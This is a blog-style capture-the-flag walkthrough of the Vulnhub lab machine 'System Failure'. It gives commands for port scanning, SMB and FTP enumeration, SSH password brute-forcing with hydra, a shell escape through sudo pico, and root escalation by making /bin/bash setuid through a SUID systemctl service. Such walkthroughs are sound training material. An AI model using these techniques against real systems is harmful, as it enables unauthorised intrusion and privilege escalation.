System Failure Walkthrough – Vulnhub – Writeup

System Failure is a medium machine from Vulnhub by the author 0xJin. This machine requires a bit of knowledge of sysadmin. However, the author of the machine might have unintentionally misconfigured this machine that allows us to escape several steps. This would definitely make it easy to do the machine. Nevertheless, I am going to walk you through the other way and mention the possible unintended misconfiguration. “System Failure Walkthrough – Vulnhub – Writeup”.

Link to the machine: https://www.vulnhub.com/entry/system-failure-1,654/

Walkthrough of Hacksudo FOG

Identify the target

First of all, we have to identify the IP address of the machine.

fping -aqg 10.0.2.0/24

Scan open ports

Then, we have to check the open ports on the target machine.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.52

Here, we can see that we have SMB, FTP, SSH and HTTP services available on the target. Also, we don’t have anonymous access to the FTP service. Hence, we can check if there any shares in the SMB service that we can access anonymously.

SMB enumeration

I like to use smbmap because it shows us the permissions on the shares.

smbmap -H 10.0.2.52

There is a share “anonymous” that has read and write access. So, we can log into it.

smbclient -N \\\\10.0.2.52\\anonymous

You can see that, there is a file “share” which I downloaded on my local machine. Upon opening the file, we can see a message from the admin.

cat share

It says that the user has left his login credentials to the FTP server. At the end of the message, we can see a hash. We can crack the hash using https://crackstation.net.

The hash is an NTLM hash and it successfully cracked it. However, we still don’t know the username. Now, we can guess that the username might be admin. But, to be sure, we can enumerate SMB further.

enum4linux -a 10.0.2.52 | tee smb.log

There are four users on the machine, one of which is admin. So, using the credentials, I could log into the FTP server.

lftp -u admin,__password__ 10.0.2.52

Now, at this point, I am going to explain what might be unintentional here. The author has used the same password for the user admin in the SSH service. So, you can log in as the user admin and explore the /var/www/html directory for further enumeration. Similarly, the user admin has access to the files of the whole machines using the FTP client. So, even if the user didn’t have access to the SSH service, he would still see the required files. This surely simplifies what I am going to show you further.

ssh access
FTP access

Anyway, I am going to see the content of the home directory first. Only the “Syst3m” directory is not empty. Similarly, it has a text that has some messages and some files inside the directory “F4luR3”. So, I downloaded the files as follows.

I had created a directory “failures” on my local machine. By using ‘lcd’, I changed my local directory to failures. Upon looking at the files, they all looked similar with very few differences. Hence, I combined all these files into a single file.

cat failures/* > combined.txt
more combined.txt

Since most of the words are repeated we can extract unique words.

grep -o -E '\w+' combined.txt | sort -u -f 

Upon searching through the output, we get an encoded message.

This doesn’t have “/” or “=” characters but has lowercase, uppercase and numbers. So, we can guess that this is a base62. However, we can check one by one from the cyber chef online tool. Anyway, it gave me a path.

HTTP enumeration

The main page doesn’t have much information.

When I used the previously found path on this page, it gave me a 404 error. Hence, I have to do the fuzzing.

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.2.52/FUZZ -e .html,.php,.txt,.bak -of html -o dir.html

This gave us a path “area4”. When I happened the decoded path to this, we get a valid page.

However, if you had gone through SSH, you have the access to these files already and you don’t have to do all of these steps. That’s why I think those were unintentional misconfigurations.

Moving further, there is a note and a wordlist on the path.

The note says that not everything goes the right way. I tried bruteforcing the normal way and it didn’t give me any password. So, I used the additional options. Since I have already found out the users from SMB enumeration, I copied them in a new file “users”.

hydra -L users -P useful.txt 10.0.2.52 ssh -t 4 -V -u -e nsr

And, that gave me the password of the user valex.

ssh valex@10.0.2.52
ls -al
cat user.txt

Finally, we can get the user flag on the home directory.

Escalate to jin

When we see the sudo permissions of the user valex, we can see that he can execute a binary pico as the user jin.

sudo -l

The application was nothing but a copy of nano. And, nano allows executing commands as well.

Reference: https://gtfobins.github.io/gtfobins/nano/

sudo -u jin pico
^R^X
reset; bash 1>&0 2>&0

And, we got the shell.

reset

On the home directory of the user jin, we got our second flag.

cd
ls -al
cat user2.txt

The user has left a message on the file secret.txt.

cat secret.txt 
Reminder: I had left something in /opt/system

This is a rabbit hole.

Then, I checked the SUID binaries from the use jin.

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

We have systemctl as a SUID binary. Therefore, we can create a service that allows us to get root access. You can spawn a reverse shell, however, I am going to give the bash shell setuid permission.

TF=$(mktemp).service

echo '[Service]
Type=oneshot
ExecStart=chmod +s /bin/bash
[Install]
WantedBy=multi-user.target' > $TF

systemctl link $TF
systemctl enable --now $TF

The execution is successful and now since I have the bash binary as SUID, I can easily get the root access.

bash -p

Next, I captured the flag.

cat root.txt

The user suggests that one has to get access to jin. Since I have got access to jin, this is valid for me. Anyway, the user has put a different flag on the same directory.

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x